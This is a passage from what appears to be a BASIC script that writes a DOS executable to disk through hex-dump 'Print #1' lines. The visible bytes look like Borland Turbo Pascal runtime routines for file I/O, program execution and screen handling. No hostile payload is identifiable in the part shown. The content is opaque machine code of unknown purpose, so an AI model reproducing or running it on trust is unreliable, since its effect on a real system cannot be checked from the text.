06 B4 2D CD 21 5D CA" Print #1, "E0C20 08 00 55 8B EC B8 00 33 CD 21 C4 7E 06 26 88 15" Print #1, "E0C30 5D CA 04 00 55 8B EC 8A 56 06 B8 01 33 CD 21 5D" Print #1, "E0C40 CA 02 00 55 8B EC C4 7E 0A 26 8B 1D B8 00 57 CD" Print #1, "E0C50 21 73 06 33 C9 33 D2 EB 02 33 C0 A3 F4 06 C4 7E" Print #1, "E0C60 06 FC 91 AB 92 AB 5D CA 08 00 55 8B EC C4 7E 0A" Print #1, "E0C70 26 8B 1D 8B 4E 06 8B 56 08 B8 01 57 CD 21 72 02" Print #1, "E0C80 33 C0 A3 F4 06 5D CA 08 00 55 8B EC 83 EC 50 1E" Print #1, "E0C90 C5 76 0C 8D 7E B0 16 07 FC AC 3C 4F 72 02 B0 4F" Print #1, "E0CA0 98 91 F3 A4 32 C0 AA C5 56 06 B4 1A CD 21 8D 56" Print #1, "E0CB0 B0 16 1F 8B 4E 0A B4 4E CD 21 1F C4 7E 06 E8 20" Print #1, "E0CC0 00 8B E5 5D CA 0A 00 55 8B EC 1E C5 56 06 B4 1A" Print #1, "E0CD0 CD 21 1F B4 4F CD 21 C4 7E 06 E8 04 00 5D CA 04" Print #1, "E0CE0 00 72 1E 83 C7 1E 1E 06 1F 32 C0 B9 00 01 FC F2" Print #1, "E0CF0 AE F6 D1 8A C1 4F 8B F7 4E FD F3 A4 AA FC 1F 33" Print #1, "E0D00 C0 A3 F4 06 C3 55 8B EC C4 7E 06 FC 8B 46 0C B1" Print #1, "E0D10 09 D3 E8 05 BC 07 AB 8B 46 0C B1 05 D3 E8 25 0F" Print #1, "E0D20 00 AB 8B 46 0C 25 1F 00 AB 8B 46 0A B1 0B D3 E8" Print #1, "E0D30 AB 8B 46 0A B1 05 D3 E8 25 3F 00 AB 8B 46 0A 25" Print #1, "E0D40 1F 00 D1 E0 AB 5D CA 08 00 55 8B EC 1E C5 76 0A" Print #1, "E0D50 FC AD 2D BC 07 B1 09 D3 E0 92 AD B1 05 D3 E0 03" Print #1, "E0D60 D0 AD 03 D0 AD B1 0B D3 E0 93 AD B1 05 D3 E0 03" Print #1, "E0D70 D8 AD D1 E8 03 C3 1F C4 7E 06 AB 92 AB 5D CA 08" Print #1, "E0D80 00 55 8B EC 83 EC 20 1E FC C5 76 06 8D 7E E0 16" Print #1, "E0D90 07 AC 3C 1F 76 02 B0 1F 98 8B C8 40 8B D0 E3 0E" Print #1, "E0DA0 AC 3C 61 72 06 3C 7A 77 02 2C 20 AA E2 F2 B0 3D" Print #1, "E0DB0 AA 1F 1E 8E 1E 3E 00 8E 1E 2C 00 33 F6 80 3C 00" Print #1, "E0DC0 74 11 8D 7E E0 8B CA F3 A6 74 08 4E AC 0A C0 75" Print #1, "E0DD0 FB EB EA 8B FE 1E 07 32 C0 B9 00 01 F2 AE F6 D1" Print #1, "E0DE0 C4 7E 0A 8A C1 AA F3 A4 1F 8B E5 5D CA 04 00 55"


Print #1, "E0DF0 8B EC 89 26 F6 06 8C 16 F8 06 81 EC FE 00 8E 1E" Print #1, "E0E00 3E 00 A1 2C 00 89 46 F2 16 07 FC C5 76 0A 8D 7E" Print #1, "E0E10 82 AC 3C 4F 72 02 B0 4F 98 91 F3 A4 32 C0 AA C5" Print #1, "E0E20 76 06 8D BE 02 FF AC 3C 7E 72 02 B0 7E AA 98 91" Print #1, "E0E30 F3 A4 B0 0D AA 16 1F 8D B6 02 FF 89 76 F4 8C 5E" Print #1, "E0E40 F6 46 8D 7E E2 89 7E F8 8C 46 FA B8 01 29 CD 21" Print #1, "E0E50 8D 7E D2 89 7E FC 8C 46 FE B8 01 29 CD 21 8D 56" Print #1, "E0E60 82 8D 5E F2 B8 00 4B CD 21 72 02 33 C0 BA C2 01" Print #1, "E0E70 8E DA FA 8B 26 F6 06 8E 16 F8 06 FB A3 F4 06 5D" Print #1, "E0E80 CA 08 00 B4 4D CD 21 CB BF 0E 09 BE FE 02 B9 13" Print #1, "E0E90 00 90 FC 2E AC B4 35 CD 21 06 53 1E C5 15 B4 25" Print #1, "E0EA0 CD 21 1F 8F 05 8F 45 02 83 C7 04 E2 E6 CB 00 02" Print #1, "E0EB0 1B 21 23 24 34 35 36 37 38 39 3A 3B 3C 3D 3E 3F" Print #1, "E0EC0 75 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E0ED0 55 89 E5 B8 FF 00 9A 16 01 21 01 5D C3 55 89 E5" Print #1, "E0EE0 E8 28 00 BF 0E 07 1E 57 0E E8 20 03 BF 0E 07 1E" Print #1, "E0EF0 57 9A 09 03 21 01 BF 0E 08 1E 57 0E E8 0D 03 BF" Print #1, "E0F00 0E 08 1E 57 9A 0E 03 21 01 5D CB B4 0F E8 D4 05" Print #1, "E0F10 3C 07 74 0A 3C 03 76 06 B8 03 00 E8 55 00 E8 9F" Print #1, "E0F20 00 B4 08 32 FF E8 BC 05 8A C4 24 7F A2 0A 07 A2" Print #1, "E0F30 00 07 33 C0 A2 FB 06 A2 0B 07 A2 0C 07 40 A2 FA" Print #1, "E0F40 06 8E 06 4A 00 BF 6C 00 26 8A 1D 26 3A 1D 74 FB" Print #1, "E0F50 26 8A 1D B8 E4 FF 99 E8 3C 02 F7 D0 F7 D2 B9 37" Print #1, "E0F60 00 F7 F1 A3 06 07 1E 0E 1F BA 38 01 B8 1B 25 CD" Print #1, "E0F70 21 1F C3 8E 06 4A 00 26 80 26 87 00 FE 3C 07 74" Print #1, "E0F80 06 3C 04 72 02 B0 03 50 B4 00 E8 57 05 58 0A E4" Print #1, "E0F90 74 2D B8 12 11 B3 00 E8 4A 05 B8 30 11 B7 00 B2" Print #1, "E0FA0 00 E8 40 05 80 FA 2A 75 16 26 80 0E 87 00 01 B8" Print #1, "E0FB0 00 01 B9 00 06 E8 2C 05 B4 12 B3 20 E8 25 05 C3" Print #1, "E0FC0 B4 0F E8 1F 05 50 B8 30 11 B7 00 B2 00 E8 14 05" Print #1, "E0FD0 58 B1 00 0A D2 75 08 B2 18 3C 03 77 02 B1 01 8A" Print #1, "E0FE0 F2 8A D4 FE CA B4 00 80 FE 18 76 02 B4 01 A3 FE" Print #1, "E0FF0 06 89 16 08 07 88 0E FD 06 C6 06 FC 06 01 33 C0" Print #1, "E1000 A3 02 07 89 16 04 07 C3 50 1E B8 C2 01 8E D8 80" Print #1, "E1010 3E FA 06 00 74 05 C6 06 0C 07 01 1F 58 CF 80 3E" Print #1, "E1020 0C 07 00 75 01 C3 C6 06 0C 07 00 B4 01 CD 16 74" Print #1, "E1030 06 B4 00 CD 16 EB F4 B0 5E E8 1D 03 B0 43 E8 18" Print #1, "E1040 03 E8 0E 03 E9 89 FE 8B DC 36 8B 47 04 E8 23 FF" Print #1, "E1050 E8 6D FF A0 0A 07 A2 00 07 CA 02 00 8B DC 36 8A" Print #1, "E1060 57 0A 36 8A 77 08 36 8A 4F 06 36 8A 6F 04 3A D1" Print #1, "E1070 77 27 3A F5 77 23 FE CA 78 1F FE CE 78 1B FE C9" Print #1, "E1080 3A 0E 08 07 77 13 FE CD 3A 2E 09 07 77 0B 89 16" Print #1, "E1090 02 07 89 0E 04 07 E8 41 03 CA 08 00 B8 00 06 8A" Print #1, "E10A0 3E 00 07 8B 0E 02 07 8B 16 04 07 E8 36 04 8B 16" Print #1, "E10B0 02 07 E8 25 03 CB E8 1A 03 B8 00 06 8A 3E 00 07" Print #1, "E10C0 8B CA 8A 16 04 07 E8 1B 04 CB B8 01 07 EB 03 B8" Print #1, "E10D0 01 06 50 E8 FD 02 58 8A 3E 00 07 8A 0E 02 07 8A" Print #1, "E10E0 EE 8B 16 04 07 3A EE 75 02 32 C0 E8 F6 03 CB 8B" Print #1, "E10F0 DC 36 8A 57 06 36 8A 77 04 FE CA 02 16 02 07 72" Print #1, "E1100 17 3A 16 04 07 77 11 FE CE 02 36 03 07 72 09 3A" Print #1, "E1110 36 05 07 77 03 E8 C2 02 CA 04 00 E8 B5 02 8A C2" Print #1, "E1120 2A 06 02 07 FE C0 CB E8 A9 02 8A C6 2A 06 03 07" Print #1, "E1130 FE C0 CB 8B DC 36 8A 47 04 A8 F0 74 04 24 0F 0C" Print #1, "E1140 80 80 26 00 07 70 08 06 00 07 CA 02 00 8B DC 36" Print #1, "E1150 8A 47 04 24 07 B1 04 D2 E0 80 26 00 07 8F 08 06" Print #1, "E1160 00 07 CA 02 00 80 26 00 07 F7 CB 80 0E 00 07 08" Print #1, "E1170 CB A0 0A 07 A2 00 07 CB 8B DC 36 8B 4F 04 E3 13" Print #1, "E1180 8E 06 4A 00 33 FF 26 8A 1D A1 06 07 33 D2 E8 05" Print #1, "E1190 00 E2 F6 CA 02 00 2D 01 00 83 DA 00 72 05 26 3A" Print #1, "E11A0 1D 74 F3 C3 8B DC 36 8B 5F 04 B8 DD 34 BA 12 00" Print #1, "E11B0 3B D3 73 1A F7 F3 8B D8 E4 61 A8 03 75 08 0C 03" Print #1, "E11C0 E6 61 B0 B6 E6 43 8A C3 E6 42 8A C7 E6 42 CA 02" Print #1, "E11D0 00 E4 61 24 FC E6 61 CB 80 3E 0B 07 00 75 08 B4" Print #1, "E11E0 01 CD 16 B0 00 74 02 B0 01 CB A0 0B 07 C6 06 0B" Print #1, "E11F0 07 00 0A C0 75 12 32 E4 CD 16 0A C0 75 0A 88 26" Print #1, "E1200 0B 07 0A E4 75 02 B0 03 E8 13 FE CB 8B DC 1E 36" Print #1, "E1210 C5 7F 04 C7 45 02 B0 D7 C7 45 04 80 00 8D 85 80" Print #1, "E1220 00 89 45 0C 8C 5D 0E C7 45 10 67 03 8C 4D 12 C6" Print #1, "E1230 45 30 00 1F CA 04 00 8B DC 1E 36 C5 7F 04 B8 9F" Print #1, "E1240 03 BB 7D 04 8B CB 81 7D 02 B1 D7 74 0A C7 45 02" Print #1, "E1250 B2 D7 B8 4C 04 8B D8 89 45 14 8C 4D 16 89 5D 18" Print #1, "E1260 8C 4D 1A 89 4D 1C 8C 4D 1E 33 C0 1F CA 04 00 55" Print #1, "E1270 8B EC C4 7E 06 26 8B 55 04 4A 4A 26 8B 75 08 26"


Print #1, "E1280 C4 7D 0C 33 DB C6 06 0B 07 00 0E E8 5C FF B9 01" Print #1, "E1290 00 3C 08 74 34 3C 13 74 30 3C 04 74 44 49 3C 1B" Print #1, "E12A0 74 27 3C 01 74 23 3C 06 74 37 3C 1A 74 46 3C 0D" Print #1, "E12B0 74 4F 3C 20 72 CF 3B DA 74 CB 26 88 01 43 E8 98" Print #1, "E12C0 00 3B DE 76 C0 8B F3 EB BC 0B DB 74 B8 B0 08 E8" Print #1, "E12D0 87 00 B0 20 E8 82 00 B0 08 E8 7D 00 4B E2 EA EB" Print #1, "E12E0 A4 3B DE 74 A0 26 8A 01 3C 20 72 99 E8 6A 00 43" Print #1, "E12F0 E2 EF EB 91 80 3E FB 06 00 74 8A 26 88 01 43 EB" Print #1, "E1300 0A E8 4E 00 26 C7 01 0D 0A 43 43 C4 7E 06 33 C0" Print #1, "E1310 26 89 45 08 26 89 5D 0A 5D CA 04 00 8B DC 36 C4" Print #1, "E1320 7F 04 26 8B 4D 08 26 29 4D 08 E3 19 26 C4 7D 0C" Print #1, "E1330 80 3E FC 06 00 75 0B 26 8A 05 E8 1C 00 47 E2 F7" Print #1, "E1340 EB 03 E8 9C 00 E8 D6 FC 33 C0 CA 04 00 33 C0 CA" Print #1, "E1350 04 00 B0 0D E8 02 00 B0 0A 53 51 52 06 50 E8 72" Print #1, "E1360 00 58 3C 07 74 2A 3C 08 74 2D 3C 0D 74 33 3C 0A" Print #1, "E1370 74 35 B4 09 8A 1E 00 07 32 FF B9 01 00 52 E8 63" Print #1, "E1380 01 5A FE C2 3A 16 04 07 76 20 8A 16 02 07 EB 17" Print #1, "E1390 B4 0E E8 4F 01 EB 13 3A 16 02 07 74 0D FE CA EB" Print #1, "E13A0 09 8A 16 02 07 EB 03 E8 08 00 E8 2D 00 07 5A 59" Print #1, "E13B0 5B C3 FE C6 3A 36 05 07 76 18 FE CE 51 52 B8 01" Print #1, "E13C0 06 8A 3E 00 07 8B 0E 02 07 8B 16 04 07 E8 14 01" Print #1, "E13D0 5A 59 C3 B4 03 32 FF E9 0A 01 B4 02 32 FF E9 03" Print #1, "E13E0 01 1E 8E 1E 4A 00 8B 16 50 00 1F 8B DA 8B F7 26" Print #1, "E13F0 8A 05 3C 07 74 21 3C 08 74 2C 3C 0A 74 35 3C 0D" Print #1, "E1400 74 39 47 FE C2 3A 16 04 07 76 3C E8 6E 00 E8 A1" Print #1, "E1410 FF 8A 16 02 07 EB 2C E8 62 00 51 52 B8 07 0E E8" Print #1, "E1420 C2 00 5A 59 EB 1C E8 53 00 3A 16 02 07 74 13 FE" Print #1, "E1430 CA EB 0F E8 46 00 E8 79 FF EB 07 E8 3E 00 8A 16" Print #1, "E1440 02 07 47 8B F7 8B DA E2 A6 E8 30 00 1E 8E 1E 4A" Print #1, "E1450 00 89 16 50 00 8A C6 F6 26 4A 00 32 F6 03 C2 8B" Print #1, "E1460 C8 8B 16 63 00 B0 0E EE EB 00 8A C5 42 EE EB 00" Print #1, "E1470 4A B0 0F EE EB 00 8A C1 42 EE 1F C3 3B F7 74 63" Print #1, "E1480 51 52 57 1E 06 8B CF 2B CE 1E 8E 1E 4A 00 8A C7" Print #1, "E1490 F6 26 4A 00 32 FF 03 C3 D1 E0 8B F8 8B 16 63 00" Print #1, "E14A0 83 C2 06 80 3E 49 00 07 1F A1 50 00 75 03 A1 4E" Print #1, "E14B0 00 8A 1E FD 06 8A 3E 00 07 06 1F 8E C0 FC 0A DB" Print #1, "E14C0 74 16 AC 8A D8 EC A8 01 75 FB FA EC A8 01 74 FB" Print #1, "E14D0 8B C3 AB FB E2 EC EB 06 8A E7 AC AB E2 FC 07 1F" Print #1, "E14E0 5F 5A 59 C3 56 57 55 06 CD 10 07 5D 5F 5E C3 00" Print #1, "E14F0 BA C2 01 8E DA 8C 06 3E 00 33 ED E8 E9 09 E8 A0" Print #1, "E1500 00 8B C4 05 13 00 B1 04 D3 E8 8C D2 03 C2 A3 10" Print #1, "E1510 00 A3 12 00 03 06 0A 00 A3 14 00 A3 1E 00 A3 22" Print #1, "E1520 00 A3 2A 00 8E 06 3E 00 26 A1 02 00 A3 26 00 C7" Print #1, "E1530 06 30 00 D6 00 8C 0E 32 00 BF 0E 09 BE 39 02 B9" Print #1, "E1540 13 00 90 FC 2E AC B4 35 CD 21 89 1D 8C 45 02 83" Print #1, "E1550 C7 04 E2 EF 1E 0E 1F BA 0C 01 B8 00 25 CD 21 BA" Print #1, "E1560 13 01 B8 23 25 CD 21 BA DB 00 B8 24 25 CD 21 BA" Print #1, "E1570 04 01 B8 3F 25 CD 21 1F B8 0E 07 1E 50 1E 50 B8" Print #1, "E1580 63 02 0E 50 0E E8 F3 01 0E E8 6D 02 B8 0E 08 1E" Print #1, "E1590 50 1E 50 B8 63 02 0E 50 0E E8 DF 01 0E E8 5E 02" Print #1, "E15A0 CB 33 C0 9C 5B 80 E7 0F 53 9D 9C 59 80 E5 F0 80" Print #1, "E15B0 FD F0 74 0E 40 80 CF F0 53 9D 9C 59 80 E5 F0 74" Print #1, "E15C0 01 40 A2 52 00 C3 33 C0 CA 02 00 FB 83 C4 06 58" Print #1, "E15D0 83 E7 1F 81 C7 96 00 80 FC 39 73 03 BF FF FF 57" Print #1, "E15E0 B4 54 CD 21 8B EC 80 4E 16 01 58 5B 59 5A 5E 5F" Print #1, "E15F0 5D 1F 07 CF B8 D0 00 83 C4 06 EB 03 B8 C8 00 59" Print #1, "E1600 5B EB 07 B8 FF 00 33 C9 33 DB BA C2 01 8E DA FB" Print #1, "E1610 A3 38 00 8B C1 0B C3 74 3D A1 16 00 0B C0 74 2F" Print #1, "E1620 8E C0 26 A1 10 00 0B C0 74 1B 2B C3 77 17 F7 D8" Print #1, "E1630 3D 00 10 73 10 BA 10 00 F7 E2 03 C1 72 07 26 3B" Print #1, "E1640 06 08 00 72 06 26 A1 14 00 EB D1 8B C8 8C C3 2B" Print #1, "E1650 1E 3E 00 83 EB 10 89 0E 3A 00 89 1E 3C 00 C4 1E" Print #1, "E1660 34 00 8C C0 0B C3 74 13 33 C0 A3 34 00 A3 36 00" Print #1, "E1670 A3 42 00 B8 6E 01 0E 50 06 53 CB B8 0E 07 1E 50" Print #1, "E1680 0E E8 CF 01 B8 0E 08 1E 50 0E E8 C6 01 BF 0E 09" Print #1, "E1690 BE 39 02 B9 13 00 90 FC 2E AC B4 25 1E C5 15 CD" Print #1, "E16A0 21 1F 83 C7 04 E2 F0 A1 3A 00 0B 06 3C 00 74 29" Print #1, "E16B0 BB 4C 02 E8 2A 00 A1 38 00 E8 32 00 BB 5B 02 E8" Print #1, "E16C0 1E 00 A1 3C 00 E8 40 00 B0 3A E8 55 00 A1 3A 00" Print #1, "E16D0 E8 35 00 BB 60 02 E8 07 00 A1 38 00 B4 4C CD 21" Print #1, "E16E0 2E 8A 07 0A C0 74 06 E8 38 00 43 EB F3 C3 B1 64" Print #1, "E16F0 E8 07 00 B1 0A E8 02 00 EB 04 32 E4 F6 F1 04 30" Print #1, "E1700 50 E8 1E 00 58 8A C4 C3 50 8A C4 E8 01 00 58 50"


Print #1, "E1710 B1 04 D2 E8 E8 03 00 58 24 0F 04 30 3C 3A 72 02" Print #1, "E1720 04 07 8A D0 B4 06 CD 21 C3 00 02 1B 21 23 24 34" Print #1, "E1730 35 36 37 38 39 3A 3B 3C 3D 3E 3F 75 52 75 6E 74" Print #1, "E1740 69 6D 65 20 65 72 72 6F 72 20 00 20 61 74 20 00" Print #1, "E1750 2E 0D 0A 00 50 6F 72 74 69 6F 6E 73 20 43 6F 70" Print #1, "E1760 79 72 69 67 68 74 20 28 63 29 20 31 39 38 33 2C" Print #1, "E1770 39 32 20 42 6F 72 6C 61 6E 64 BA 33 D2 8B DC 1E" Print #1, "E1780 36 C4 7F 08 36 C5 77 04 FC 33 C0 AB B8 B0 D7 AB" Print #1, "E1790 B8 80 00 AB 33 C0 AB AB AB 8D 45 74 AB 8C C0 AB" Print #1, "E17A0 B8 10 09 AB B8 21 01 AB 33 C0 B9 0E 00 F3 AB B9" Print #1, "E17B0 4F 00 0B D2 75 09 AC 3A C8 76 04 8A C8 E3 08 AC" Print #1, "E17C0 0A C0 74 03 AA E2 F8 32 C0 AA 1F CA 08 00 8B DC" Print #1, "E17D0 36 C4 7F 0A 36 8B 47 04 26 89 45 04 36 8B 47 06" Print #1, "E17E0 26 89 45 0C 36 8B 47 08 26 89 45 0E 33 C0 26 89" Print #1, "E17F0 45 08 26 89 45 0A CA 0A 00 BA B1 D7 EB 08 BA B2" Print #1, "E1800 D7 EB 03 BA B3 D7 55 8B EC C4 7E 06 26 8B 45 02" Print #1, "E1810 3D B1 D7 74 12 3D B2 D7 74 0D 3D B0 D7 74 10 C7" Print #1, "E1820 06 42 00 66 00 EB 24 52 06 57 0E E8 25 00 5A 33" Print #1, "E1830 C0 26 89 55 02 26 89 45 08 26 89 45 0A BB 10 00" Print #1, "E1840 E8 4C 00 74 06 26 C7 45 02 B0 D7 5D CA 04 00 B0" Print #1, "E1850 00 EB 02 B0 01 55 8B EC C4 7E 06 26 81 7D 02 B1" Print #1, "E1860 D7 74 18 26 81 7D 02 B2 D7 74 08 C7 06 42 00 67" Print #1, "E1870 00 EB 18 50 BB 14 00 E8 15 00 58 0A C0 74 0C BB" Print #1, "E1880 1C 00 E8 0A 00 26 C7 45 02 B0 D7 5D CA 04 00 06" Print #1, "E1890 57 06 57 26 FF 19 0B C0 74 03 A3 42 00 5F 07 C3" Print #1, "E18A0 8B DC 1E 36 C4 7F 04 26 C5 55 0C 26 8B 4D 04 26" Print #1, "E18B0 8B 1D B4 3F CD 21 72 10 26 89 45 0A 33 C0 26 C7" Print #1, "E18C0 45 08 00 00 1F CA 04 00 26 C7 45 0A 00 00 EB EE" Print #1, "E18D0 8B DC 1E 36 C4 7F 04 26 C5 55 0C 33 C9 26 87 4D" Print #1, "E18E0 08 26 8B 1D B4 40 CD 21 72 07 2B C1 74 03 B8 65" Print #1, "E18F0 00 1F CA 04 00 8B DC 1E 36 C4 7F 04 26 C5 55 0C" Print #1, "E1900 33 C9 26 87 4D 08 26 8B 1D B4 40 CD 21 72 02 33" Print #1, "E1910 C0 1F CA 04 00 8B DC 36 C4 7F 04 26 8B 1D 83 FB" Print #1, "E1920 04 76 06 B4 3E CD 21 72 02 33 C0 CA 04 00 BA 33" Print #1, "E1930 D2 8B DC 1E 36 C4 7F 08 36 C5 77 04 FC 33 C0 AB" Print #1, "E1940 B8 B0 D7 AB 33 C0 B9 16 00 F3 AB B9 4F 00 0B D2" Print #1, "E1950 75 09 AC 3A C8 76 04 8A C8 E3 08 AC 0A C0 74 03" Print #1, "E1960 AA E2 F8 32 C0 AA 1F CA 08 00 A0 54 00 B4 3D 33" Print #1, "E1970 D2 EB 06 B8 00 3C BA 01 00 55 8B EC C4 7E 08 26" Print #1, "E1980 81 7D 02 B0 D7 74 1A 26 81 7D 02 B3 D7 74 08 C7" Print #1, "E1990 06 42 00 66 00 EB 34 50 52 06 57 0E E8 4C 00 5A" Print #1, "E19A0 58 26 80 7D 30 00 74 12 1E 8D 55 30 06 1F 33 C9" Print #1, "E19B0 CD 21 1F 73 06 A3 42 00 EB 11 92 26 C7 45 02 B3" Print #1, "E19C0 D7 26 89 05 8B 46 06 26 89 45 04 5D CA 06 00 8B" Print #1, "E19D0 DC 36 C4 7F 04 E8 38 00 75 0E 33 C9 26 8B 1D B4" Print #1, "E19E0 40 CD 21 73 03 A3 42 00 CA 04 00 8B DC 36 C4 7F" Print #1, "E19F0 04 E8 1C 00 75 17 26 8B 1D 83 FB 04 76 09 B4 3E" Print #1, "E1A00 CD 21 73 03 A3 42 00 26 C7 45 02 B0 D7 CA 04 00" Print #1, "E1A10 26 81 7D 02 B3 D7 74 06 C7 06 42 00 67 00 C3 B4" Print #1, "E1A20 3F BA 64 00 EB 05 B4 40 BA 65 00 55 8B EC C4 7E" Print #1, "E1A30 0A E8 DC FF 75 1B 1E 52 C5 56 06 26 8B 4D 04 26" Print #1, "E1A40 8B 1D CD 21 5A 1F 72 06 3B C1 74 05 8B C2 A3 42" Print #1, "E1A50 00 5D CA 04 00 B3 3F B9 64 00 EB 05 B3 40 B9 65" Print #1, "E1A60 00 55 8B EC C4 7E 10 E8 A6 FF 75 3F 8B 46 0A 0B" Print #1, "E1A70 C0 74 1C 1E 51 26 F7 65 04 8B C8 C5 56 0C 8A E3" Print #1, "E1A80 26 8B 1D CD 21 59 1F 72 1F 33 D2 26 F7 75 04 C4" Print #1, "E1A90 7E 06 8C C2 0B D7 74 05 26 89 05 EB 1C 3B 46 0A" Print #1, "E1AA0 74 17 89 0E 42 00 EB 11 A3 42 00 C4 7E 06 8C C2" Print #1, "E1AB0 0B D7 74 05 33 C0 26 89 05 5D CA 0E 00 55 8B EC" Print #1, "E1AC0 C4 7E 0A E8 4A FF 75 21 8B 46 08 26 F7 65 04 8B" Print #1, "E1AD0 C8 8B 46 06 26 F7 65 04 03 CA 8B D0 26 8B 1D B8" Print #1, "E1AE0 00 42 CD 21 73 03 A3 42 00 5D CA 08 00 8B DC 1E" Print #1, "E1AF0 36 C5 57 04 83 C2 30 B4 41 CD 21 1F 73 03 A3 42" Print #1, "E1B00 00 CA 04 00 BA 33 D2 55 8B EC 83 EC 50 1E C5 76" Print #1, "E1B10 06 8D 7E B0 16 07 FC B9 4F 00 0B D2 75 09 AC 3A" Print #1, "E1B20 C8 76 04 8A C8 E3 08 AC 0A C0 74 03 AA E2 F8 32" Print #1, "E1B30 C0 AA C5 56 0A 83 C2 30 8D 7E B0 B4 56 CD 21 1F" Print #1, "E1B40 73 05 A3 42 00 EB 14 1E 8D 76 B0 16 1F C4 7E 0A" Print #1, "E1B50 83 C7 30 FC AC AA 0A C0 75 FA 1F 8B E5 5D CA 08" Print #1, "E1B60 00 55 8B EC 8B 56 06 0B D2 74 05 E8 49 00 EB 30" Print #1, "E1B70 B4 30 CD 21 3C 03 B8 00 00 72 25 8E 06 3E 00 26" Print #1, "E1B80 8E 06 2C 00 33 FF FC 26 3A 05 74 07 B9 FF FF F2" Print #1, "E1B90 AE EB F4 83 C7 03 8B F7 B9 00 01 F2 AE 91 F6 D0"


Print #1, "E1BA0 1E 06 1F C4 7E 08 FC AA 91 F3 A4 1F 5D CA 02 00" Print #1, "E1BB0 33 D2 E8 02 00 93 CB 8E 06 3E 00 BF 80 00 26 8A" Print #1, "E1BC0 0D 32 ED 47 33 DB E3 09 26 80 3D 20 77 03 47 E2" Print #1, "E1BD0 F7 8B F7 E3 09 26 80 3D 20 76 03 47 E2 F7 8B C7" Print #1, "E1BE0 2B C6 74 04 43 4A 75 DE C3 FC 8B DC 8C DA 36 C4" Print #1, "E1BF0 7F 08 36 C5 77 04 AC AA 8A C8 32 ED F3 A4 8E DA" Print #1, "E1C00 CA 04 00 FC 8B DC 8C DA 36 C5 77 0A 36 C4 7F 06" Print #1, "E1C10 36 8B 4F 04 AC 3A C1 76 02 8A C1 AA 8A C8 32 ED" Print #1, "E1C20 F3 A4 8E DA CA 0A 00 FC 8B DC 8C DA 36 C4 7F 0C" Print #1, "E1C30 36 C5 77 08 8A 04 32 E4 36 8B 4F 06 0B C9 7F 03" Print #1, "E1C40 B9 01 00 03 F1 2B C1 72 13 40 36 8B 4F 04 0B C9" Print #1, "E1C50 7D 02 33 C9 3B C1 76 06 8B C1 EB 02 33 C0 AA 8B" Print #1, "E1C60 C8 F3 A4 8E DA CA 08 00 FC 8B DC 8C DA 36 C4 7F" Print #1, "E1C70 08 36 C5 77 04 26 8A 0D 32 ED AC 26 00 05 73 08" Print #1, "E1C80 26 C6 05 FF 8A C1 F6 D0 03 F9 47 8A C8 F3 A4 8E" Print #1, "E1C90 DA CA 04 00 55 8B EC 1E C5 76 0A FC AC 0A C0 74" Print #1, "E1CA0 2C 8A D0 32 F6 C4 7E 06 26 8A 0D 32 ED 2B CA 72" Print #1, "E1CB0 1C 41 47 AC F2 AE 75 15 8B C7 8B D9 8B CA 49 F3" Print #1, "E1CC0 A6 74 0E 8B F8 8B CB 8B 76 0A 46 EB E6 33 C0 EB" Print #1, "E1CD0 04 48 2B 46 06 1F 5D CA 08 00 FC 8B DC 8C DA 36" Print #1, "E1CE0 C5 77 08 36 C4 7F 04 AC 26 8A 25 47 8A C8 3A CC" Print #1, "E1CF0 76 02 8A CC 0A C9 74 06 32 ED F3 A6 75 02 3A C4" Print #1, "E1D00 8E DA CA 08 00 FC 8B DC 36 C4 7F 06 B0 01 AA 36" Print #1, "E1D10 8A 47 04 AA CA 02 00 FC 8B DC 8C DA 36 C4 7F 0A" Print #1, "E1D20 36 C5 77 06 36 8B 47 04 AA 8B C8 F3 A4 8E DA CA" Print #1, "E1D30 06 00 55 8B EC 81 EC 00 02 83 7E 06 01 7D 05 C7" Print #1, "E1D40 46 06 01 00 8D BE 00 FF 16 57 C4 7E 0A 06 57 B8" Print #1, "E1D50 01 00 50 8B 46 06 48 50 0E E8 CB FE C4 7E 0E 06" Print #1, "E1D60 57 0E E8 03 FF 8D BE 00 FE 16 57 C4 7E 0A 06 57" Print #1, "E1D70 FF 76 06 B8 FF 00 50 0E E8 AC FE 0E E8 E9 FE C4" Print #1, "E1D80 7E 0A 06 57 FF 76 08 0E E8 78 FE 8B E5 5D CA 0C" Print #1, "E1D90 00 55 8B EC 81 EC 00 02 83 7E 06 00 7E 5C 83 7E" Print #1, "E1DA0 08 00 7E 56 81 7E 08 FF 00 7F 4F 81 7E 06 FF 00" Print #1, "E1DB0 7E 05 C7 46 06 FF 00 8D BE 00 FF 16 57 C4 7E 0A" Print #1, "E1DC0 06 57 B8 01 00 50 8B 46 08 48 50 0E E8 58 FE 8D" Print #1, "E1DD0 BE 00 FE 16 57 C4 7E 0A 06 57 8B 46 08 03 46 06" Print #1, "E1DE0 50 B8 FF 00 50 0E E8 3E FE 0E E8 7B FE C4 7E 0A" Print #1, "E1DF0 06 57 B8 FF 00 50 0E E8 09 FE 8B E5 5D CA 08 00" Print #1, "E1E00 8B DC 1E 36 C5 7F 04 33 C9 89 0D B8 00 3D 81 7D" Print #1, "E1E10 02 B1 D7 74 0D B0 02 FF 05 81 7D 02 B3 D7 74 02" Print #1, "E1E20 B4 3C 80 7D 30 00 74 09 8D 55 30 CD 21 72 5A 89" Print #1, "E1E30 05 B8 B0 03 BA 21 01 33 C9 33 DB 81 7D 02 B1 D7" Print #1, "E1E40 74 2F 8B 1D B8 00 44 CD 21 F6 C2 80 B8 05 04 BA" Print #1, "E1E50 21 01 8B C8 8B DA 75 14 81 7D 02 B3 D7 75 03 E8" Print #1, "E1E60 2B 00 B8 E0 03 BA 21 01 33 C9 33 DB C7 45 02 B2" Print #1, "E1E70 D7 89 45 14 89 55 16 89 4D 18 89 5D 1A C7 45 1C" Print #1, "E1E80 25 04 C7 45 1E 21 01 33 C0 1F CA 04 00 33 D2 33" Print #1, "E1E90 C9 8B 1D B8 02 42 CD 21 2D 80 00 83 DA 00 73 04" Print #1, "E1EA0 33 C0 33 D2 8B CA 8B D0 8B 1D B8 00 42 CD 21 8D" Print #1, "E1EB0 95 80 00 B9 80 00 8B 1D B4 3F CD 21 73 02 33 C0" Print #1, "E1EC0 33 DB 3B D8 74 20 80 B9 80 00 1A 74 03 43 EB F2" Print #1, "E1ED0 8B D3 2B D0 B9 FF FF 8B 1D B8 02 42 CD 21 33 C9" Print #1, "E1EE0 8B 1D B4 40 CD 21 C3 BF 56 00 1E 07 B9 5A 09 2B" Print #1, "E1EF0 CF D1 E9 33 C0 FC F3 AB C3 00 00 00 00 